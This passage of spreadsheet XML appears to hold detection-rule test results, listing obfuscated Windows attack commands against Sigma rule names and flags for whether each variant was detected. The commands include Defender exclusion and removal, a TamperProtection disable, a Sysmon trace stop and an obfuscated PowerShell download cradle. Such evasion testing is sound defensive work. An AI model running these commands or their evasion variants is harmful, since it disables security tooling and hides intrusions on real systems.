          <t>C:\Windows\System32\cmd.exe /c Start C:\Temp\WinPwn_Tool.exe -recon</t>
        </is>
      </c>
      <c r="F2005" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G2005" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H2005" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I2005" s="43" t="n"/>
      <c r="J2005" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K2005" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2006" ht="15.75" customHeight="1" s="42">
      <c r="A2006" s="43" t="inlineStr">
        <is>
          <t>t1555.003</t>
        </is>
      </c>
      <c r="B2006" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C2006" s="36" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D2006" s="36" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E2006" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ep bypass -file C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F2006" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G2006" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H2006" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I2006" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J2006" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K2006" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2007" ht="15.75" customHeight="1" s="42">
      <c r="A2007" s="43" t="inlineStr">
        <is>
          <t>t1555.003</t>
        </is>
      </c>
      <c r="B2007" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C2007" s="36" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D2007" s="36" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E2007" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass -file C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F2007" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G2007" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H2007" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I2007" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J2007" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K2007" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2008" ht="15.75" customHeight="1" s="42">
      <c r="A2008" s="43" t="inlineStr">
        <is>
          <t>t1555.003</t>
        </is>
      </c>
      <c r="B2008" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C2008" s="36" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D2008" s="36" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E2008" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass -fiLE C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F2008" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2008" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2008" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2008" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J2008" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K2008" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2009" ht="15.75" customHeight="1" s="42">
      <c r="A2009" s="43" t="inlineStr">
        <is>
          <t>t1555.003</t>
        </is>
      </c>
      <c r="B2009" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C2009" s="43" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D2009" s="43" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E2009" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -eP bypass -fiLe C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F2009" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2009" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2009" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2009" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J2009" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K2009" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2010" ht="15.75" customHeight="1" s="42">
      <c r="A2010" s="36" t="inlineStr">
        <is>
          <t>t1555.003</t>
        </is>
      </c>
      <c r="B2010" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C2010" s="36" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D2010" s="36" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E2010" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass -FilE C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F2010" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2010" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2010" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2010" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J2010" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K2010" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2011" ht="15.75" customHeight="1" s="42">
      <c r="A2011" s="43" t="n"/>
      <c r="B2011" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_namespace_defender</t>
        </is>
      </c>
      <c r="C2011" s="43" t="inlineStr">
        <is>
          <t>Potential Windows Defender Tampering Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D2011" s="43" t="inlineStr">
        <is>
          <t>51cbac1e-eee3-4a90-b1b7-358efb81fa0a</t>
        </is>
      </c>
      <c r="E2011" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Invoke-CimMethod -Namespace 'root\Microsoft\Windows\Defender' -ClassName MSFT_MpPreference -MethodName Add -Arguments @{ExclusionPath='C:\Malware'}"</t>
        </is>
      </c>
      <c r="F2011" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2011" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2011" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2011" s="43" t="n"/>
      <c r="J2011" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K2011" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2012" ht="15.75" customHeight="1" s="42">
      <c r="A2012" s="36" t="n"/>
      <c r="B2012" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_namespace_defender</t>
        </is>
      </c>
      <c r="C2012" s="36" t="inlineStr">
        <is>
          <t>Potential Windows Defender Tampering Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D2012" s="36" t="inlineStr">
        <is>
          <t>51cbac1e-eee3-4a90-b1b7-358efb81fa0a</t>
        </is>
      </c>
      <c r="E2012" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -cOmmANd "Invoke-CimMethod -Namespace 'root\Microsoft\Windows\Defender' -ClassName MSFT_MpPreference -MethodName Add -Arguments @{ExclusionPath='C:\Malware'}"</t>
        </is>
      </c>
      <c r="F2012" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2012" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2012" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2012" s="43" t="n"/>
      <c r="J2012" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K2012" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2013" ht="15.75" customHeight="1" s="42">
      <c r="A2013" s="36" t="n"/>
      <c r="B2013" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_namespace_defender</t>
        </is>
      </c>
      <c r="C2013" s="36" t="inlineStr">
        <is>
          <t>Potential Windows Defender Tampering Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D2013" s="36" t="inlineStr">
        <is>
          <t>51cbac1e-eee3-4a90-b1b7-358efb81fa0a</t>
        </is>
      </c>
      <c r="E2013" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "Invoke-CimMethod -Namespace 'root\Microsoft\Windows\Defender' -ClassName MSFT_MpPreference -MethodName Add -Arguments @{ExclusionPath='C:\Malware'}"</t>
        </is>
      </c>
      <c r="F2013" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G2013" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H2013" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I2013" s="43" t="n"/>
      <c r="J2013" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K2013" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2014" ht="15.75" customHeight="1" s="42">
      <c r="A2014" s="36" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B2014" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_dism_remove</t>
        </is>
      </c>
      <c r="C2014" s="36" t="inlineStr">
        <is>
          <t>Dism Remove Online Package</t>
        </is>
      </c>
      <c r="D2014" s="36" t="inlineStr">
        <is>
          <t>43e32da2-fdd0-4156-90de-50dfd62636f9</t>
        </is>
      </c>
      <c r="E2014" s="36" t="inlineStr">
        <is>
          <t>Dism -Online -Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet</t>
        </is>
      </c>
      <c r="F2014" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G2014" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H2014" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I2014" s="36" t="n"/>
      <c r="J2014" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K2014" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2015" ht="15.75" customHeight="1" s="42">
      <c r="A2015" s="36" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B2015" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_dism_remove</t>
        </is>
      </c>
      <c r="C2015" s="36" t="inlineStr">
        <is>
          <t>Dism Remove Online Package</t>
        </is>
      </c>
      <c r="D2015" s="36" t="inlineStr">
        <is>
          <t>43e32da2-fdd0-4156-90de-50dfd62636f9</t>
        </is>
      </c>
      <c r="E2015" s="36" t="inlineStr">
        <is>
          <t>Dism "/Online" "/Disable-Feature" /FeatureName:Windows-Defender /Remove /NoRestart /quiet</t>
        </is>
      </c>
      <c r="F2015" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G2015" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H2015" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I2015" s="36" t="inlineStr">
        <is>
          <t>Dism Remove Online Package (43e32da2-fdd0-4156-90de-50dfd62636f9)</t>
        </is>
      </c>
      <c r="J2015" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K2015" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2016" ht="15.75" customHeight="1" s="42">
      <c r="A2016" s="36" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B2016" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_dism_remove</t>
        </is>
      </c>
      <c r="C2016" s="36" t="inlineStr">
        <is>
          <t>Dism Remove Online Package</t>
        </is>
      </c>
      <c r="D2016" s="36" t="inlineStr">
        <is>
          <t>43e32da2-fdd0-4156-90de-50dfd62636f9</t>
        </is>
      </c>
      <c r="E2016" s="36" t="inlineStr">
        <is>
          <t>cmd /c Dism /On^line /Disable-Fe^ature /FeatureName:Windows-Defender /Remove /NoRestart /quiet</t>
        </is>
      </c>
      <c r="F2016" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G2016" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H2016" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I2016" s="36" t="inlineStr">
        <is>
          <t>Dism Remove Online Package (43e32da2-fdd0-4156-90de-50dfd62636f9); Dism Remove Online Package (43e32da2-fdd0-4156-90de-50dfd62636f9)</t>
        </is>
      </c>
      <c r="J2016" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K2016" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2017" ht="15.75" customHeight="1" s="42">
      <c r="A2017" s="36" t="n"/>
      <c r="B2017" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_logman_disable_eventlog</t>
        </is>
      </c>
      <c r="C2017" s="36" t="inlineStr">
        <is>
          <t>Suspicious Windows Trace ETW Session Tamper Via Logman.EXE</t>
        </is>
      </c>
      <c r="D2017" s="36" t="inlineStr">
        <is>
          <t>cd1f961e-0b96-436b-b7c6-38da4583ec00</t>
        </is>
      </c>
      <c r="E2017" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c "logman s^top "SYSMON TRACE" -ets"</t>
        </is>
      </c>
      <c r="F2017" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G2017" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H2017" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I2017" s="36" t="n"/>
      <c r="J2017" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K2017" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2018" ht="15.75" customHeight="1" s="42">
      <c r="A2018" s="36" t="n"/>
      <c r="B2018" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_cradle_obfuscated</t>
        </is>
      </c>
      <c r="C2018" s="36" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell OneLiner Execution</t>
        </is>
      </c>
      <c r="D2018" s="36" t="inlineStr">
        <is>
          <t>44e24481-6202-4c62-9127-5a0ae8e3fe3d</t>
        </is>
      </c>
      <c r="E2018" s="36" t="inlineStr">
        <is>
          <t>powershell -nop -noni -ep bypass -w h -c "$u=('http://localhost:1337/'|%{(IRM $*)});&amp;(''.SubString.ToString()[67,72,64]-Join'')($u); Import-Module C:\Users\EXAMPLE\Invoke-WMIExec.ps1; Invoke-WMIExec"</t>
        </is>
      </c>
      <c r="F2018" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G2018" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H2018" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I2018" s="4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018" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K2018" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2019" ht="15.75" customHeight="1" s="42">
      <c r="A2019" s="36" t="n"/>
      <c r="B2019" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_cradle_obfuscated</t>
        </is>
      </c>
      <c r="C2019" s="36" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell OneLiner Execution</t>
        </is>
      </c>
      <c r="D2019" s="36" t="inlineStr">
        <is>
          <t>44e24481-6202-4c62-9127-5a0ae8e3fe3d</t>
        </is>
      </c>
      <c r="E2019" s="36" t="inlineStr">
        <is>
          <t>powershell -NoProfile -noni -Ep bypass -w h -c "$u=('http://localhost:1337/'|%{(IRM $*)});&amp;(''.SubString.ToString()[67,72,64]-Join'')($u); Import-Module C:\Users\EXAMPLE\Invoke-WMIExec.ps1; Invoke-WMIExec"</t>
        </is>
      </c>
      <c r="F2019" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G2019" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H2019" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I2019" s="4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2019" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K2019" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2020" ht="15.75" customHeight="1" s="42">
      <c r="A2020" s="36" t="n"/>
      <c r="B2020" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_cradle_obfuscated</t>
        </is>
      </c>
      <c r="C2020" s="36" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell OneLiner Execution</t>
        </is>
      </c>
      <c r="D2020" s="36" t="inlineStr">
        <is>
          <t>44e24481-6202-4c62-9127-5a0ae8e3fe3d</t>
        </is>
      </c>
      <c r="E2020" s="36" t="inlineStr">
        <is>
          <t>powershell -NoProfile -noni -ExecutionPolicy bypass -w h -Command "$u=('http://localhost:1337/'|%{(IRM $*)});&amp;(''.SubString.ToString()[67,72,64]-Join'')($u); Import-Module C:\Users\EXAMPLE\Invoke-WMIExec.ps1; Invoke-WMIExec"</t>
        </is>
      </c>
      <c r="F2020" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G2020" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H2020" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I2020" s="36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2020" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K2020" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2021" ht="15.75" customHeight="1" s="42">
      <c r="A2021" s="36" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B2021" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_windows_defender_tamper</t>
        </is>
      </c>
      <c r="C2021" s="36" t="inlineStr">
        <is>
          <t>Suspicious Windows Defender Registry Key Tampering Via Reg.EXE</t>
        </is>
      </c>
      <c r="D2021" s="36" t="inlineStr">
        <is>
          <t>452bce90-6fb0-43cc-97a5-affc283139b3</t>
        </is>
      </c>
      <c r="E2021" s="43" t="inlineStr">
        <is>
          <t>reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d 0 /f</t>
        </is>
      </c>
      <c r="F2021" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2021" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2021" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2021" s="43" t="inlineStr">
        <is>
          <t>Reg Add Suspicious Paths (b7e2a8d4-74bb-4b78-adc9-3f92af2d4829); Suspicious Windows Defender Registry Key Tampering Via Reg.EXE (452bce90-6fb0-43cc-97a5-affc283139b3)</t>
        </is>
      </c>
      <c r="J2021" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K2021" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2022" ht="15.75" customHeight="1" s="42">
      <c r="A2022" s="43" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B2022" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_windows_defender_tamper</t>
        </is>
      </c>
      <c r="C2022" s="36" t="inlineStr">
        <is>
          <t>Suspicious Windows Defender Registry Key Tampering Via Reg.EXE</t>
        </is>
      </c>
      <c r="D2022" s="36" t="inlineStr">
        <is>
          <t>452bce90-6fb0-43cc-97a5-affc283139b3</t>
        </is>
      </c>
      <c r="E2022" s="43" t="inlineStr">
        <is>
          <t>reg  add  "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d 0 /f</t>
        </is>
      </c>
      <c r="F2022" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2022" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2022" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2022" s="43" t="inlineStr">
        <is>
          <t>Reg Add Suspicious Paths (b7e2a8d4-74bb-4b78-adc9-3f92af2d4829); Suspicious Windows Defender Registry Key Tampering Via Reg.EXE (452bce90-6fb0-43cc-97a5-affc283139b3)</t>
        </is>
      </c>
      <c r="J2022" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K2022" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2023" ht="15.75" customHeight="1" s="42">
      <c r="A2023" s="43" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B2023" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_windows_defender_tamper</t>
        </is>
      </c>
      <c r="C2023" s="43" t="inlineStr">
        <is>
          <t>Suspicious Windows Defender Registry Key Tampering Via Reg.EXE</t>
        </is>
      </c>
      <c r="D2023" s="43" t="inlineStr">
        <is>
          <t>452bce90-6fb0-43cc-97a5-affc283139b3</t>
        </is>
      </c>
      <c r="E2023" s="43" t="inlineStr">
        <is>
          <t>reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d 0x0 /f</t>
        </is>
      </c>
      <c r="F2023" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2023" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2023" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2023" s="43" t="inlineStr">
        <is>
          <t>Reg Add Suspicious Paths (b7e2a8d4-74bb-4b78-adc9-3f92af2d4829); Suspicious Windows Defender Registry Key Tampering Via Reg.EXE (452bce90-6fb0-43cc-97a5-affc283139b3)</t>
        </is>
      </c>
      <c r="J2023" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K2023" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2024" ht="15.75" customHeight="1" s="42">
      <c r="A2024" s="36" t="n"/>
      <c r="B2024" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_eventlog_clear</t>
        </is>
      </c>
      <c r="C2024" s="36" t="inlineStr">
        <is>
          <t>Suspicious Eventlog Clearing or Configuration Change Activity</t>
        </is>
      </c>
      <c r="D2024" s="36" t="inlineStr">
        <is>
          <t>cc36992a-4671-4f21-a91d-6c2b72a2edf5</t>
        </is>
      </c>
      <c r="E2024" s="36" t="inlineStr">
        <is>
          <t>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Start-Process sl C:\ProgramData\DataExchange,Start</t>
        </is>
      </c>
      <c r="F2024" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G2024" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H2024" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I2024" s="43" t="n"/>
      <c r="J2024" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K2024" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2025" ht="15.75" customHeight="1" s="42">
      <c r="A2025" s="36" t="inlineStr">
        <is>
          <t>t1562.004</t>
        </is>
      </c>
      <c r="B2025" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_fw_add_rule</t>
        </is>
      </c>
      <c r="C2025" s="36" t="inlineStr">
        <is>
          <t>New Firewall Rule Added Via Netsh.EXE</t>
        </is>
      </c>
      <c r="D2025" s="36" t="inlineStr">
        <is>
          <t>cd5cfd80-aa5f-44c0-9c20-108c4ae12e3c</t>
        </is>
      </c>
      <c r="E2025" s="36" t="inlineStr">
        <is>
          <t>netsh advfirewall firewall  add  rule name="RDPPORTLatest-TCP-In" dir=in action=allow protocol=TCP localport=4489</t>
        </is>
      </c>
      <c r="F2025" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G2025" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H2025" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I2025" s="43" t="inlineStr">
        <is>
          <t>New Firewall Rule Added Via Netsh.EXE (cd5cfd80-aa5f-44c0-9c20-108c4ae12e3c)</t>
        </is>
      </c>
      <c r="J2025" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K2025" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2026" ht="15.75" customHeight="1" s="42">
      <c r="A2026" s="43" t="inlineStr">
        <is>
          <t>t1562.004</t>
        </is>
      </c>
      <c r="B2026" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_fw_add_rule</t>
        </is>
      </c>
      <c r="C2026" s="43" t="inlineStr">
        <is>
          <t>New Firewall Rule Added Via Netsh.EXE</t>
        </is>
      </c>
      <c r="D2026" s="43" t="inlineStr">
        <is>
          <t>cd5cfd80-aa5f-44c0-9c20-108c4ae12e3c</t>
        </is>
      </c>
      <c r="E2026" s="43" t="inlineStr">
        <is>
          <t>netsh advfirewall "firewall" add rule name="RDPPORTLatest-TCP-In" dir=in action=allow protocol=TCP localport=4489</t>
        </is>
      </c>
      <c r="F2026" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2026" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2026" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2026" s="43" t="n"/>
      <c r="J2026" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K2026" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2027" ht="15.75" customHeight="1" s="42">
      <c r="A2027" s="43" t="inlineStr">
        <is>
          <t>t1562.004</t>
        </is>
      </c>
      <c r="B2027" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_fw_add_rule</t>
        </is>
      </c>
      <c r="C2027" s="43" t="inlineStr">
        <is>
          <t>New Firewall Rule Added Via Netsh.EXE</t>
        </is>
      </c>
      <c r="D2027" s="43" t="inlineStr">
        <is>
          <t>cd5cfd80-aa5f-44c0-9c20-108c4ae12e3c</t>
        </is>
      </c>
      <c r="E2027" s="43" t="inlineStr">
        <is>
          <t>netsh advfirewall firewall add rule name=Dropbox dir=in action=allow "program=C:\Program Files\Dropbox\Client\Dropbox.exe" enable=yes profile=Any protocol=TCP localport=4489</t>
        </is>
      </c>
      <c r="F2027" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2027" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2027" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2027" s="43" t="inlineStr">
        <is>
          <t>New Firewall Rule Added Via Netsh.EXE (cd5cfd80-aa5f-44c0-9c20-108c4ae12e3c)</t>
        </is>
      </c>
      <c r="J2027" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K2027" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2028" ht="15.75" customHeight="1" s="42">
      <c r="A2028" s="43" t="inlineStr">
        <is>
          <t>t1564.006</t>
        </is>
      </c>
      <c r="B2028" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_virtualbox_execution</t>
        </is>
      </c>
      <c r="C2028" s="43" t="inlineStr">
        <is>
          <t>Virtualbox Driver Installation or Starting of VMs</t>
        </is>
      </c>
      <c r="D2028" s="43" t="inlineStr">
        <is>
          <t>bab049ca-7471-4828-9024-38279a4c04da</t>
        </is>
      </c>
      <c r="E2028" s="43" t="inlineStr">
        <is>
          <t>rundll32 "C:\Program Files\Oracle\VirtualBox\VBoxRT".dll,RTR3Init</t>
        </is>
      </c>
      <c r="F2028" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2028" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2028" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2028" s="43" t="n"/>
      <c r="J2028" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K2028" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2029" ht="15.75" customHeight="1" s="42">
      <c r="A2029" s="43" t="inlineStr">
        <is>
          <t>t1564.006</t>
        </is>
      </c>
      <c r="B2029" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_virtualbox_execution</t>
        </is>
      </c>
      <c r="C2029" s="43" t="inlineStr">
        <is>
          <t>Virtualbox Driver Installation or Starting of VMs</t>
        </is>
      </c>
      <c r="D2029" s="43" t="inlineStr">
        <is>
          <t>bab049ca-7471-4828-9024-38279a4c04da</t>
        </is>
      </c>
      <c r="E2029" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c ""C:\Program Files\Oracle\VirtualBox\VBoxManage.exe" st^artvm "Atomic VM""</t>
        </is>
      </c>
      <c r="F2029" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2029" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2029" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2029" s="43" t="n"/>
      <c r="J2029" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K2029" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2030" ht="15.75" customHeight="1" s="42">
      <c r="A2030" s="43" t="inlineStr">
        <is>
          <t>t1564.006</t>
        </is>
      </c>
      <c r="B2030" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_virtualbox_execution</t>
        </is>
      </c>
      <c r="C2030" s="43" t="inlineStr">
        <is>
          <t>Virtualbox Driver Installation or Starting of VMs</t>
        </is>
      </c>
      <c r="D2030" s="43" t="inlineStr">
        <is>
          <t>bab049ca-7471-4828-9024-38279a4c04da</t>
        </is>
      </c>
